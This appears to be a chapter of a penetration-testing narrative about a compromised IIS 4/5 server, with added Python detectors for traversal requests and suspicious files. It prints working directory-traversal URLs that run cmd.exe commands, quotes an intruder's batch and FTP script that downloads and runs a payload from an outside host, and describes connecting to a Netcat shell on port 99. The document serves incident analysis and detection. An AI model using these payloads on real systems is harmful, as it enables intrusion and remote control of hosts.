Penetration Testing: Day 1, Night
At this point, I had a good notion of where to start probing. Using the following URL, I commanded the server to show me a directory listing of the c:\winnt\system32 directory:
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\winnt\system32\
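The request above works because IIS 4 and 5 checked whether a path escaped the virtual directory before they had finished decoding it, so an encoded backslash (%5c), a doubly encoded one (%255c) or an overlong UTF-8 sequence (%c0%af) slipped past the check and was only turned into a separator afterwards (the traversal bugs fixed by MS00-078 and MS01-026). The following detector, added here as an example and not code from the original article, decodes request stems the same way and flags any request that leaves the web root or reaches cmd.exe, whether or not the server answered 200. The log lines are constructed, in IIS W3C extended format; the field order (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status) is an assumption of this example.

```python
"""Flag IIS 4/5-style directory-traversal requests by decoding URLs the way IIS did.

Added example, not code from the original article. SAMPLE_LOG is constructed;
the W3C field order below is an assumption of this example.
"""
import re
from urllib.parse import unquote

# Constructed sample: three traversal attempts (two succeeded, one got a 404)
# and two ordinary requests. Fields: date time c-ip method uri-stem uri-query status.
SAMPLE_LOG = """\
2002-10-30 17:53:10 192.168.0.5 GET /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe /c+dir+c:\\winnt\\system32\\ 200
2002-10-30 17:55:42 192.168.0.5 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+type+c:\\scripts.bat 200
2002-10-30 17:56:01 10.0.0.9 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2002-10-30 18:01:13 10.0.0.7 GET /default.asp - 200
2002-10-30 18:02:44 10.0.0.7 GET /images/logo.gif - 200
"""

# Overlong UTF-8 sequences that IIS 4/5 mapped to a path separator after the
# "does it escape the virtual directory?" check had already run (MS00-078).
OVERLONG_SEPARATORS = {"%c0%af": "/", "%c1%9c": "\\", "%c1%1c": "\\"}

LOG_FIELDS = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")


def canonicalize(uri_stem: str) -> str:
    """Return the path IIS would actually have executed, relative to the web root.

    Mimics the bug: overlong sequences become separators, then the string is
    percent-decoded twice (the superfluous decode of MS01-026, %255c -> %5c -> \\).
    Backslashes are folded to '/', and '..' segments that climb above the web
    root are kept as a leading '/..' marker instead of being silently dropped.
    """
    s = uri_stem
    for enc, sep in OVERLONG_SEPARATORS.items():
        s = re.sub(re.escape(enc), lambda _m, sep=sep: sep, s, flags=re.I)
    s = unquote(unquote(s))
    parts = []
    for seg in s.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if parts and parts[-1] != "..":
                parts.pop()
            else:
                parts.append("..")  # escaped the web root
        else:
            parts.append(seg)
    return "/" + "/".join(parts)


def is_traversal(uri_stem: str) -> bool:
    """True when a dot-dot request, decoded as IIS did, leaves the web root or names cmd.exe."""
    if ".." not in uri_stem:
        return False
    canon = canonicalize(uri_stem).lower()
    return canon.startswith("/..") or canon.endswith("/cmd.exe")


def scan(log_text: str):
    """Return (client_ip, status, decoded path, decoded command) for every traversal request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_FIELDS.match(line)
        if not m:
            continue
        _date, _time, ip, _method, stem, query, status = m.groups()
        if is_traversal(stem):
            cmd = unquote(query.replace("+", " ")) if query != "-" else ""
            hits.append((ip, int(status), canonicalize(stem), cmd))
    return hits


if __name__ == "__main__":
    for ip, status, path, cmd in scan(SAMPLE_LOG):
        print(f"{ip} {status} {path} {cmd!r}")
```

Note that the 404 is still reported: a failed attempt is evidence of scanning, and on a box with more than one exploitable virtual directory the next attempt usually succeeds.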
Once the browser returned the results, I scanned the files and folders and quickly spotted several suspicious files that piqued my interest. Figure 1 is a screen shot of these files; see if you can spot the problem.
Figure 1 Partial directory listing of c:\winnt\system32\.
Did anything seem like it didn't belong? If you recognized these files for what they are, congratulations! Unfortunately, many network administrators wouldn't give these files a second glance.
The following is a listing of the files that concerned me and why:
PipeCmd.exe: Client half of PipeCmd, a tool that runs commands on a remote NT host over SMB named pipes; a remote-control tool popular with intruders.
omnithread_tr.dll: One of the three files needed to run VNC, a popular and legitimate remote-control utility.
VNCHooks.dll: The second of the three VNC files.
Vnsystask.exe: The third: the VNC server itself, most likely a renamed WinVNC.exe, installed as a back door that hides from the logged-on user.
nc.exe: Netcat, the ubiquitous network utility, here used to provide a remote command shell.
pw.exe: A renamed pwdump2.exe, which dumps the user names and password hashes from the SAM for offline cracking.
Samdump.dll: The library pwdump2 injects into lsass.exe to extract the account information.
GetAdmin.exe: A well-known NT 4 privilege-escalation exploit that adds an ordinary user to the local Administrators group.
In other words, this server had not one but two intruder toolkits (root kits, in the loose sense of the term) installed in the c:\winnt\system32 directory. As I was about to learn, this was just one of more than 10 root kits that were all competing for the server's attention. In fact, the SysStat directory that is also shown in Figure 1, installed October 7, 2002, holds yet another root kit.
Next, I used another URL to pull up the c:\ directory listing, just to see if there were any interesting files in the root directory of the server. The following is the URL used; Listing 1-2 shows the output it returned.
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+dir+c:\
Listing 1-2: Directory Listing of the Server's C Drive
 Volume in drive C has no label.
 Volume Serial Number is DCF0-0832

 Directory of C:

10/10/02  01:03p           1,000,000 1mb
05/20/02  09:32a                   0 AUTOEXEC.BAT
10/18/02  12:57a                 789 bootobc.dll
10/10/02  12:42p                 223 CDIR.TXT
05/20/02  09:32a                   0 CONFIG.SYS
10/30/02  05:53p                   0 dir.txt
11/23/99  10:04a             208,144 dns.exe
06/07/02  11:04a             524,288 errorlog.evt
05/28/02  07:06p       <DIR>          exchsrvr
10/04/02  06:38p                   0 explorer.exe
10/04/02  06:38p                   0 explorer.ini
05/20/02  10:18p       <DIR>          hpfonts
09/24/02  06:49p       <DIR>          hplj2100
09/29/02  01:03p           6,721,536 httpodbc.dll
09/27/02  09:36p       <DIR>          IIStmp
10/18/02  01:11a       <DIR>          InetPub
10/10/02  12:45p               6,656 INFUSE.EXE
10/10/02  12:43p                 602 LOGIN.TXT
10/02/02  02:17p              59,392 ncx99.exe
10/30/02  02:47p               6,693 netstat.txt
10/30/02  10:09a         536,870,912 pagefile.sys
07/24/02  01:29p       <DIR>          Program Files
10/10/02  12:44p                  81 pt.txt
10/14/02  05:21a               1,307 ra_slave.log
10/26/02  01:21p                 716 Script.bat
10/26/02  01:21p                  95 Script.txt
10/29/02  07:42p               1,949 servudaemon.ini
10/28/02  04:40p                 528 ServUStartUpLog.txt
10/04/02  04:25p          15,000,000 SR.CD2-H2O.r41
09/28/02  01:33p       <DIR>          TEMP
10/10/02  12:43p              17,920 TLIST.EXE
06/18/02  10:00p       <DIR>          veritas
09/28/02  01:18p       <DIR>          WIN32
10/10/02  12:45p             496,836 WINMGNT.EXE
10/30/02  01:09p       <DIR>          WINNT
              35 File(s)    560,918,667 bytes
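Reading a listing like this by eye is how the suspicious files were spotted, but the same judgement can be written down and run against every `dir` output collected during an incident. The following parser, added here as an example and not code from the original article, turns NT 4-style `dir` output into records, cross-checks the "35 File(s)" footer against what it parsed (a cheap way to catch lines lost in transcription), and then applies three triage heuristics: names the article itself identified as intruder tools, zero-byte files with executable extensions (explorer.exe at 0 bytes in c:\ is a placeholder, not Windows), and files written in the same minute, which is how a dropper script leaves its footprints. The listing text is copied from Listing 1-2; the heuristics and thresholds are this example's own assumptions.

```python
"""Parse NT `dir` output and flag entries worth a closer look.

Added example, not part of the original article. LISTING is copied from
Listing 1-2; KNOWN_TOOLS holds the names the article identifies; the
triage heuristics are this example's own assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

LISTING = """\
 Volume in drive C has no label.
 Volume Serial Number is DCF0-0832

 Directory of C:

10/10/02  01:03p           1,000,000 1mb
05/20/02  09:32a                   0 AUTOEXEC.BAT
10/18/02  12:57a                 789 bootobc.dll
10/10/02  12:42p                 223 CDIR.TXT
05/20/02  09:32a                   0 CONFIG.SYS
10/30/02  05:53p                   0 dir.txt
11/23/99  10:04a             208,144 dns.exe
06/07/02  11:04a             524,288 errorlog.evt
05/28/02  07:06p       <DIR>          exchsrvr
10/04/02  06:38p                   0 explorer.exe
10/04/02  06:38p                   0 explorer.ini
05/20/02  10:18p       <DIR>          hpfonts
09/24/02  06:49p       <DIR>          hplj2100
09/29/02  01:03p           6,721,536 httpodbc.dll
09/27/02  09:36p       <DIR>          IIStmp
10/18/02  01:11a       <DIR>          InetPub
10/10/02  12:45p               6,656 INFUSE.EXE
10/10/02  12:43p                 602 LOGIN.TXT
10/02/02  02:17p              59,392 ncx99.exe
10/30/02  02:47p               6,693 netstat.txt
10/30/02  10:09a         536,870,912 pagefile.sys
07/24/02  01:29p       <DIR>          Program Files
10/10/02  12:44p                  81 pt.txt
10/14/02  05:21a               1,307 ra_slave.log
10/26/02  01:21p                 716 Script.bat
10/26/02  01:21p                  95 Script.txt
10/29/02  07:42p               1,949 servudaemon.ini
10/28/02  04:40p                 528 ServUStartUpLog.txt
10/04/02  04:25p          15,000,000 SR.CD2-H2O.r41
09/28/02  01:33p       <DIR>          TEMP
10/10/02  12:43p              17,920 TLIST.EXE
06/18/02  10:00p       <DIR>          veritas
09/28/02  01:18p       <DIR>          WIN32
10/10/02  12:45p             496,836 WINMGNT.EXE
10/30/02  01:09p       <DIR>          WINNT
              35 File(s)    560,918,667 bytes
"""

# Tool names from the article's own findings (lower-cased for matching).
KNOWN_TOOLS = {"ncx99.exe", "nc.exe", "pipecmd.exe", "pw.exe", "samdump.dll",
               "getadmin.exe", "vnchooks.dll", "omnithread_tr.dll", "vnsystask.exe"}
EXECUTABLE_EXT = (".exe", ".dll", ".bat", ".cmd", ".com", ".scr")

DIR_LINE = re.compile(r"^(\d{2}/\d{2}/\d{2})\s+(\d{2}:\d{2}[ap])\s+(<DIR>|[\d,]+)\s+(.+?)\s*$")
FOOTER = re.compile(r"^\s*(\d+) File\(s\)\s+([\d,]+) bytes")


def parse_dir(listing: str):
    """Return one dict (name, is_dir, size, mtime) per entry line; header/footer are skipped."""
    entries = []
    for line in listing.splitlines():
        m = DIR_LINE.match(line.strip())
        if not m:
            continue
        date, time_, size, name = m.groups()
        entries.append({
            "name": name,
            "is_dir": size == "<DIR>",
            "size": 0 if size == "<DIR>" else int(size.replace(",", "")),
            "mtime": datetime.strptime(f"{date} {time_}m", "%m/%d/%y %I:%M%p"),
        })
    return entries


def footer_matches(listing: str, entries) -> bool:
    """Check the 'N File(s) X bytes' footer against the parsed entries (NT counts directories in N)."""
    for line in listing.splitlines():
        m = FOOTER.match(line)
        if m:
            count, total = int(m.group(1)), int(m.group(2).replace(",", ""))
            return count == len(entries) and total == sum(e["size"] for e in entries)
    return False


def triage(entries):
    """Return (name, reason) pairs: known tool names, zero-byte executables, same-minute drops."""
    flags = []
    by_minute = defaultdict(list)
    for e in entries:
        low = e["name"].lower()
        if low in KNOWN_TOOLS:
            flags.append((e["name"], "known attacker tool name"))
        if not e["is_dir"] and e["size"] == 0 and low.endswith(EXECUTABLE_EXT):
            flags.append((e["name"], "zero-byte executable (placeholder or failed drop)"))
        if not e["is_dir"]:
            by_minute[e["mtime"]].append(e["name"])
    for when, names in sorted(by_minute.items()):
        if len(names) >= 2:
            flags.append((", ".join(sorted(names)), f"written in the same minute ({when:%m/%d/%y %I:%M%p})"))
    return flags


if __name__ == "__main__":
    parsed = parse_dir(LISTING)
    print("footer consistent:", footer_matches(LISTING, parsed))
    for name, reason in triage(parsed):
        print(f"{name:40} {reason}")
```

The same-minute heuristic is deliberately noisy (it also pairs AUTOEXEC.BAT with CONFIG.SYS from the original install); it is there to make an analyst look, not to decide for them.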
At this point, I laughed as I started to realize the scope of the infestation. In the root directory of the server were two files, scripts.bat and scripts.txt, that all but screamed "installed by a hacker." Out of curiosity, I decided to pull up the contents of these two files to see what they contained. The following are the URLs I used to do this; Listings 1-3 and 1-4 show the contents returned to the browser.
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+type+c:\scripts.bat
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe?/c+type+c:\scripts.txt
Listing 1-3: Contents of the scripts.bat File
Mkdir c:\recycler
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash old_files
Mkdir d:\recycler
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Mkdir d:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash old_files
mkdir e:\recycler
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784038887-1117
Mkdir e:\recycler\S-1-5-21-1831738385-770969707-784
c:\winnt\system32\ftp -n -s:script.txt
c:\winnt\system32\svhost.exe /i
c:\winnt\system32\psshutdown.exe -r -l -f
Listing 1-4: Contents of the scripts.txt File
open 210.171.xxx.xxx:11515
USER ironfredh hichic
get svhost.exe
get servudaemon.ini
quit
In other words, this server was H4x0r3d. I was feeling a bit left out of the fun, so I figured I would follow the path so clearly laid before me. So, I typed in one last URL that would execute the ncx99.exe file sitting in the c:\ directory, and then I telnetted to port 99 on the server.
ncx99.exe is a widely circulated build of Netcat compiled to listen on TCP port 99 and hand anyone who connects an unauthenticated cmd.exe shell. Any operating system with a Telnet client can connect to it and control the host.
Upon connection, I changed the directory to c:\ to verify that I was on the undeniably hacked server. I then performed a full recursive directory listing and redirected the results to a file in the c:\ directory with dir /s >> dir.txt, which I then downloaded to my computer for closer analysis.